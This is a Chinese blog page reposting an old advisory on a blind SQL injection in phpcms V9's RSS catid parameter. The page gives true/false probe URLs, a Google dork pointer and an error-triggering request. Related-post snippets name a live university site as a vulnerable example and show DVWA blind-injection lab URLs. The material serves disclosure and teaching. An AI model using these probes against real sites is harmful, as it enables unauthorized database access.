phpcms V9 BLind SQL Injection Vulnerability

最新推荐文章于 2024-10-31 21:38:14 发布
转载 最新推荐文章于 2024-10-31 21:38:14 发布 · 1.1k 阅读 · 0
文章标签:

#sql #mysql #table #2010 #c

本文介绍了一个存在于phpcmsV9中的盲注漏洞,包括软件信息、漏洞类型及利用方式。通过构造不同的catid参数值,可以判断SQL查询真假,从而实现盲注攻击。

=================================================================
    phpcms V9 BLind SQL Injection Vulnerability
=================================================================

Software:   phpcms V9
Vendor:     www.phpcms.cn
Vuln Type:  BLind SQL Injection
Download link:  http://www.phpcms.cn/2010/1229/326.html
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info

Google Dork:    http://www.exploit-db.com/ghdb/3676/    // check here ^_^

References:
http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html

=================================================================

    exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

    Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10  <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5   <= show MySQL Error (table)

=================================================================

    Nothing Impossible In This World Even Nobody`s Perfect

=================================================================

=========================| -=[ E0F ]=- |=========================
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入
Senimo
03-22 1507
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入LowMediumHighImpossible Low 此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。 首先判断原语句的闭合方式,当输入1'时,提示该用户不在数据库中: 可判断原SQL语句闭合方式为id=...
dvwa Vulnerability: SQL Injection (Blind)记录
最新发布
qq_36616485的博客
11-22 658
dvwa Vulnerability: SQL Injection (Blind)记录
PHPCMS V9 BLind SQL Injection Vulnerability
weixin_34037977的博客
04-10 119
见:http://seclists.org/bugtraq/2011/Jan/139 例如北大的一个网站: http://www.cala.pku.edu.cn/index.php?m=content&c=rss&catid=5&siteid=1 又如: http://www.kuqiwan.com/index.php?m=content&c=rss&a...
phpcms v9 Multiple Vulnerabilities
收集盒 Book box
07-18 981
hpcmsV9最新版SQL注射+XSS 详细说明: XSS  public function public_get_suggest_keyword() { $url = $_GET['url'].'&q='.$_GET['q']; echo $url; $res = @file_get_contents($url); if(CHARSET
DVWA下的SQL Injection(Blind)
07-25
盲注
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
### PHPCMS V9专题模块注入漏洞的分析与修复方法 #### 一、漏洞背景介绍 PHPCMS V9是一款非常流行的开源内容管理系统(Content Management System, CMS),它提供了丰富的功能来帮助用户构建和管理网站。然而,即便...
精选资源
phpcms v9的问答模块插件
02-05
5. **安全性**:作为phpcms V9的一部分,问答模块也遵循了系统的安全规范,对用户提交的数据进行过滤和验证,防止SQL注入、XSS攻击等安全问题。 6. **扩展性**:考虑到未来可能的需求变化,该插件具有良好的扩展性...
PHPCMS V9文章内容页点击量如何调用
09-29
PHPCMS V9内容管理系统中,文章内容页的点击量是网站运营者非常关注的数据指标,它能够反映用户对某篇文章的关注度。点击量的实时更新和展示对于提升用户体验和优化内容策略至关重要。本文将详细讲解如何在PHPCMS ...
phpcms v9 购物车+商品模块+订单 最新V9商城插件
03-23
综上所述,"phpcms v9 购物车+商品模块+订单 最新V9商城插件"提供了完整的电商解决方案,涵盖了从商品展示到交易完成的所有环节,且经过测试证明是可用的,对于想要快速搭建功能完善的在线商城的PHPCMS V9用户来说,...
精选资源
解决phpcms v9在谷歌等浏览器中无法上传图片的问题,修改为H5上传
07-04
phpcms V9中,图片上传通常依赖于Flash插件,这是因为在早期的Web开发中,Flash是实现文件上传的主要技术。然而,随着HTML5的发展,新的File API使得在浏览器端处理文件变得更为便捷,而且无需依赖外部插件,如...
SQL Injection(Blind)(SQL注入之盲注)
qq_59706867的博客
07-14 2069
SQL Injection(Blind),SQL盲注,相比于常规的SQL注入,他不会将返回具体的数据信息或语法信息,只会将服务器包装后的信息返回到页面中。
SQL Injection(Blind)(SQL盲注)
hclimg的博客
07-23 3479
1. SQL盲注介绍 SQL盲注与一般注入的区别在于一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示 页面上获取执行的结果,甚至连注入语句是否执行都无法得知。 2. SQL盲注原理 盲注的话,就像跟一个机器人聊天,但是这个机器人只会回答“是”与“不是”,因此,得从一个大的范围去问是与不是,然后慢慢的缩小范围,最后就是类似于问“数据库名字的第一个字是不是a啊”这...
Blind SQL Injection on DVWA(Medium Level)
312小公举的专栏
05-15 1433
Vulnerability: SQL Injection (Blind)与前面的Vulnerability: SQL Injection这两个页面的差别就在于有没有有用的错误信息或者我们已经习惯的反馈内容。 本文的终极任务是获得user和password。 1.简单的输入测试 输入2得到: 输入2 or 1=1得到: 输入 2' or '1'='1得到: 以上说明了 $id = m
dvwa第二题:SQL Injection(Blind)
yuqangy的专栏
02-08 722
---level: low--- 1.采用bool法(猜具体数据采用二分法) -- table count http://192.168.43.140/vulnerabilities/sqli_blind/?id=1%27%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_...
DVWA——SQL Injection (Blind)(low)
分享简单的安全技术
01-11 458
SQL Injection (Blind) 界面 源代码 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS[
DVWA靶场练习(七)—— SQL Injection (Blind)
liuzibo1024的博客
10-31 1266
SQL盲注是一种SQL注入技术,它允许攻击者在应用程序没有直接显示数据库查询结果的情况下,执行恶意SQL查询。在传统的SQL注入中,攻击者可以直接从应用程序的响应中获取数据库的错误信息或查询结果。但在盲注中,攻击者无法直接获取这些信息,因此需要通过其他方式来确定注入是否成功,并进一步探测和利用数据库中的数据。SLEEP()
SQL Injection (Blind)_low
qq_45434762的博客
10-10 339
1.判断注入类型 http://192.168.126.147/DVWA-master/vulnerabilities/sqli_blind/?id=1 --+&Submit=Submit# 显示存在 http://192.168.126.147/DVWA-master/vulnerabilities/sqli_blind/?id=a --+&Submit=Submi...
DVWA靶场通关(SQL InjectionBlind))
m0_56010012的博客
03-21 2631
SQL InjectionBlind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 LOW 核心代码 SQL Injection (Blind) Source vulnerabilities/sqli_blind/source/low.php <?php if( isset( $
SQL Injection (Blind)之盲注(原理、分类、利用)
Innocence_0的博客
03-06 1583
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
Phpcms V9下拉菜单实例源码分享
#### 描述:“在之前的文章Phpcms V9导航循环下拉菜单的调用技巧中,分享了自定义调用栏目和对应的子栏目下拉菜单的方法,这次应之前的承诺,放出Phpcms V9下拉菜单的实例文件,与关注CMSYOU的朋友们分享!...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值